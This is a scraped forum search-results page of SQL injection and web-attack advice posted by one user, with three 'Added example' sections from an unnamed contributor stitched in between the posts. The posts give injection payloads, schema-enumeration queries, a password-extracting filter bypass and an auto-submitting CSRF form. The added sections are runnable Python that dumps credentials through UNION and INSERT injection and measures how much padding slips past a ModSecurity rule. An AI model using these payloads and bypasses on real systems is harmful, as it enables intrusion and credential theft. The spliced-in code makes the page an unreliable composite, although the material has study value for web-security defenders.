Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Current Page: 1 of 24
Results 1 - 30 of 705
1 year ago
Reiners
netpumber Wrote:
> I thought that my query was executed without an error and that's why it happened.
> Let's create an error
>
> .asp?id=8+convert(int,(select table_name from information_schema.tables))--
>
> RETURNED:
>
> Microsoft OLE DB Provider for SQL Server error '80040e14'
> Inc
Forum: SQL and Code Injection
1 year ago
Reiners
Sr.Gr33n Wrote:
> 1 and (/*!50000 Select count(*) from*/ COLLATION) = 1 --
>
> and I can't see the webpage... and it's strange because COLLATION is a table that ever exists...

as a side note: table COLLATION exists in the database information_schema, so you better specify it if you want to access it: select
Forum: SQL and Code Injection
2 years ago
Reiners
yes (if you can taint it)
Forum: SQL and Code Injection
2 years ago
Reiners
welcome mrkenobi
Forum: Intro
2 years ago
Reiners
obviously the GET parameter "root" is split on "_". so "shared_0" becomes "WHERE file_root_type = 'shared' AND file_root_ID = 0". if you put "and 1=2" the query may return nothing, but the application can still decide to display default values or something. Try to avoid spaces with /**/: root=shared_0/**/order/**/by/**/10--%09-
Forum: SQL and Code Injection
2 years ago
Reiners
it is probably not vulnerable to SQL injection. note the escaped single quote. is the backslash \ escaped too? PS: although your description is not that detailed, it is nice to see a thread again without "please hack http://url/".
Forum: SQL and Code Injection
2 years ago
Reiners
it means that you have successfully appended the GET parameter apos :P
Forum: SQL and Code Injection
2 years ago
Reiners
you could batch the process of
1) extract all files from the jar (any unzip software will do)
2) decompile all class files (with JAD or JavaDecompiler)
3) run a static analysis tool on all files (like "findbugs", I haven't tested any java sca tools)
Forum: SQL and Code Injection
2 years ago
Reiners
you mean this tool with the red button to own every website? I sell it for only 50$
Forum: SQL and Code Injection
2 years ago
Reiners
<form action=url method=post>
<input type="hidden" name="param" value="xss">
</form>
<script>document.forms[0].submit()</script>
Forum: SQL and Code Injection
2 years ago
Reiners
MySQL 5: '||(true)#1' '||true#' '=true UNION# # # #original_by_lightos SELECT \N,group_concat(password)# ## /*!FROM*/ users WHERE '1
Forum: Projects
2 years ago
Reiners
this might get you in the right direction http://sla.ckers.org/forum/read.php?24,37039
Forum: Obfuscation
2 years ago
Reiners
hi, glad you like it. btw, version 0.51 is already shipped https://websec.wordpress.com/2011/12/31/project-rips-v0-50-status/
Forum: Projects
2 years ago
Reiners
hm? it's a path traversal
Forum: SQL and Code Injection
2 years ago
Reiners
https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Forum: SQL and Code Injection
2 years ago
Reiners
take the first eval and echo it. now change the eval inside to echo (luckily eval and echo have the same size =) and encode it back: Quote echo base64_encode(gzcompress("\$O000O0O00=fopen(\$OOO0O0O00,'rb');while(--\$O00O00O00)fgets(\$O000O0O00,1024);fgets(\$O000O0O00,4096);\$OO00O00O0=gzuncompress(base64_decode(strtr(fread(\$O000O0O00,480),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvX
Forum: Obfuscation
2 years ago
Reiners
unfortunately you can not encode the table name in any way.
Forum: SQL and Code Injection
3 years ago
Reiners
@Albino: the new url is https://phpids.org/
Forum: Projects
3 years ago
Reiners
@mssql: yes you can. @site: glad you liked the blogposts =) I honestly recommend reconstructing the filter by fuzzing the keywords allowed/denied and finding a bypass step by step with a locally installed instance of MySQL. I won't participate, sorry.
Forum: SQL and Code Injection
3 years ago
Reiners
assuming from your commands that we are talking about MySQL: you cannot use stacked queries on MySQL. that means you can alter the statement you are injecting into, but you cannot query a different statement.
Forum: SQL and Code Injection
3 years ago
Reiners
document.forms[0].submit() ?
Forum: CSRF and Session Info
3 years ago
Reiners
you could discover your own ways and have a look at what's inside the information_schema database (http://www.xcdsql.org/MySQL/information_schema/5.1/MySQL_5_1_INFORMATION_SCHEMA.html) or just don't learn anything and use this:
// databases
select group_concat(schema_name) from information_schema.schemata
// tables for 'database'
select group_concat(table_name) from information_schema.tables whe
Forum: SQL and Code Injection
3 years ago
Reiners
blind SQLi is fine too as long as you can extract the data without triggering any alert.
Forum: Obfuscation
3 years ago
Reiners
http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/
Forum: SQL and Code Injection
3 years ago
Reiners
select tablename from pg_tables where schemaname = 'the database name you found out'
Forum: SQL and Code Injection
3 years ago
Reiners
I don't know.
Forum: SQL and Code Injection
3 years ago
Reiners
1. WAFs to bypass: mod_security, greensql, phpids
2. null: often used in "union select null,null,null..." as type-independent placeholders for a column (the number depends on the number of columns in the original select query). ?id=null is the same as ?id=-1 or ?id=1 and 1=0: you want to achieve that the original SELECT query returns nothing and therefore you choose a WHERE condition t
Forum: SQL and Code Injection
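Added example (my own code, not part of Reiners' posts and not from any application discussed in the thread): the NULL placeholder trick for counting columns, why ?id=-1 is needed before a UNION row shows up, and the catalog dump from the information_schema reply above. SQLite's in-memory engine stands in for the MySQL backend (assumption); the mechanics are identical, only the catalog differs (sqlite_master here, information_schema.tables on MySQL). The table names, rows and the `vulnerable_lookup` handler are constructed for the demo.

```python
import sqlite3

# SQLite stands in for the MySQL backend discussed in the thread (assumption).
# MySQL catalog: information_schema.tables / information_schema.columns
# SQLite catalog: sqlite_master
def build_db():
    """Constructed sample data, not taken from any real application."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'hello', 'first post');
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
        INSERT INTO users VALUES (2, 'bob', 'hunter2');
    """)
    return db

DB = build_db()

def vulnerable_lookup(id_param):
    """Hypothetical application code: the ?id= parameter is concatenated into the query."""
    sql = "SELECT id, title, body FROM articles WHERE id = " + id_param
    return DB.execute(sql).fetchall()

def find_column_count(max_cols=8):
    """UNION SELECT NULL,NULL,...: NULL is accepted in a column of any type, so the
    first width that does not raise an error is the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup("-1 UNION SELECT " + ",".join(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    return None

def union_rows(id_value, expr, cols, from_clause=""):
    """Put `expr` into the second column (the one the page displays), NULL elsewhere."""
    placeholders = ["NULL"] * cols
    placeholders[1] = expr
    return vulnerable_lookup(f"{id_value} UNION SELECT {','.join(placeholders)} {from_clause}")

def dump_table_names(cols):
    # id=-1 matches no real article, so the UNION row is the only row the page gets.
    # MySQL equivalent: group_concat(table_name) FROM information_schema.tables
    rows = union_rows("-1", "group_concat(name)", cols, "FROM sqlite_master WHERE type='table'")
    return rows[0][1]

def dump_credentials(cols):
    # MySQL equivalent: group_concat(concat(name,0x3a,password)) FROM users
    rows = union_rows("-1", "group_concat(name || ':' || password)", cols, "FROM users")
    return rows[0][1]

if __name__ == "__main__":
    n = find_column_count()
    print("columns in original SELECT:", n)
    # With a valid id the application shows the real article first; with -1 only our row remains.
    print("id=1  UNION -> rows returned:", len(union_rows("1", "'x'", n)))
    print("id=-1 UNION -> rows returned:", len(union_rows("-1", "'x'", n)))
    print("tables:", dump_table_names(n))
    print("credentials:", dump_credentials(n))
```

The column-count loop relies on the database raising an error for a mismatched UNION; on a page that swallows errors you fall back to the ORDER BY n technique from the shared_0 reply further up.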
3 years ago
Reiners
of course you need to fill the 3rd parameter as well
"INSERT INTO table VALUES ('$_POST','$_POST','5')"
test1=a',(subselect),'5')-- -
Forum: SQL and Code Injection
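Added example (my own code, not from the post or the application it discusses) of the INSERT injection described above: the first form field closes its own quote, supplies the remaining two columns itself (a subselect in the second slot, '5' in the third) and comments out the application's tail with `-- -`. SQLite stands in for MySQL (assumption); the `comments`/`users` tables and the `vulnerable_insert` handler are constructed for the demo.

```python
import sqlite3

# Constructed sample schema; SQLite stands in for the MySQL backend (assumption).
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE users (name TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 's3cret');
    CREATE TABLE comments (author TEXT, text TEXT, rating TEXT);
""")

def vulnerable_insert(test1, test2):
    """Hypothetical form handler matching the post:
    INSERT INTO table VALUES ('$_POST','$_POST','5')"""
    sql = f"INSERT INTO comments VALUES ('{test1}','{test2}','5')"
    DB.execute(sql)
    return sql

def list_comments():
    """The normal display path of the application (what the attacker reads back)."""
    return DB.execute("SELECT author, text, rating FROM comments ORDER BY rowid").fetchall()

def inject_subselect(subselect):
    """Close the VALUES tuple ourselves: second column = subselect, third column = '5',
    then `-- -` turns the rest of the application's statement into a comment."""
    payload = f"a',({subselect}),'5')-- -"
    vulnerable_insert(payload, "ignored")
    # The subselect's result now sits in the comment row and is readable through the UI.
    return list_comments()[-1][1]

if __name__ == "__main__":
    print(vulnerable_insert("alice", "nice article"))
    print("stolen:", inject_subselect("SELECT password FROM users WHERE name='admin'"))
    print(list_comments())
```

The trailing space and dash after `--` matter on MySQL, where `--` only starts a comment when followed by whitespace; SQLite is more lenient, but the payload is written the MySQL way.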
3 years ago
Reiners
@Skyphire: I'm absolutely with you, but that's what they do.
modsecurity-crs_2.2.0/base_rules/modsecurity_crs_41_sql_injection_attacks.conf
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bselect\b.{0,40}\bsubstring\b" \
select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,substring(table_name,1,1)
Forum: SQL and Code Injection
3 years ago
Reiners
don't get confused with this 0xAAA stuff. A lot of filters (including mod_security) simply have rules like "select.{40}from", meaning that 40 or more characters between the keywords will not match the rule. you don't necessarily trigger a BoF if a bypass works like this ;)
Forum: SQL and Code Injection
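Added example (my own code, not part of either post above) that runs the CRS 2.2.0 regex quoted in the @Skyphire reply against padded payloads, to show that the hex literal is nothing but distance: the rule only matches when SELECT and SUBSTRING are at most 40 characters apart. Python's `re` with `re.I` stands in for ModSecurity's PCRE engine after its lowercase transformation (assumption); the payload text is constructed.

```python
import re

# The regex from modsecurity_crs_41_sql_injection_attacks.conf as quoted in the post.
# ModSecurity normally lowercases the argument first; re.I approximates that (assumption).
CRS_SELECT_SUBSTRING = re.compile(r"\bselect\b.{0,40}\bsubstring\b", re.I)

def rule_matches(payload, rule=CRS_SELECT_SUBSTRING):
    """True when the rule would flag this request argument."""
    return rule.search(payload) is not None

def padded_payload(n_hex_digits):
    """Put a throwaway hex literal column between SELECT and SUBSTRING.
    The database just returns it as an extra column; the filter only sees the distance."""
    return ("select 0x" + "A" * n_hex_digits +
            ",substring(table_name,1,1) from information_schema.tables")

def min_padding_to_bypass(rule=CRS_SELECT_SUBSTRING, limit=200):
    """Smallest even number of hex digits (even keeps the literal a whole number of bytes)
    for which the rule no longer matches: the ' 0x' + digits + ',' gap must exceed 40."""
    for n in range(0, limit, 2):
        if not rule_matches(padded_payload(n), rule):
            return n
    return None

if __name__ == "__main__":
    for n in (0, 36, 38, 50):
        verdict = "BLOCKED" if rule_matches(padded_payload(n)) else "passes"
        print(f"{n:3d} hex digits -> {verdict}")
    print("minimum padding:", min_padding_to_bypass())
```

The same check works for any distance-based rule: drop in the regex, grow the padding until `rule_matches` turns false, and you have the window size the filter author chose.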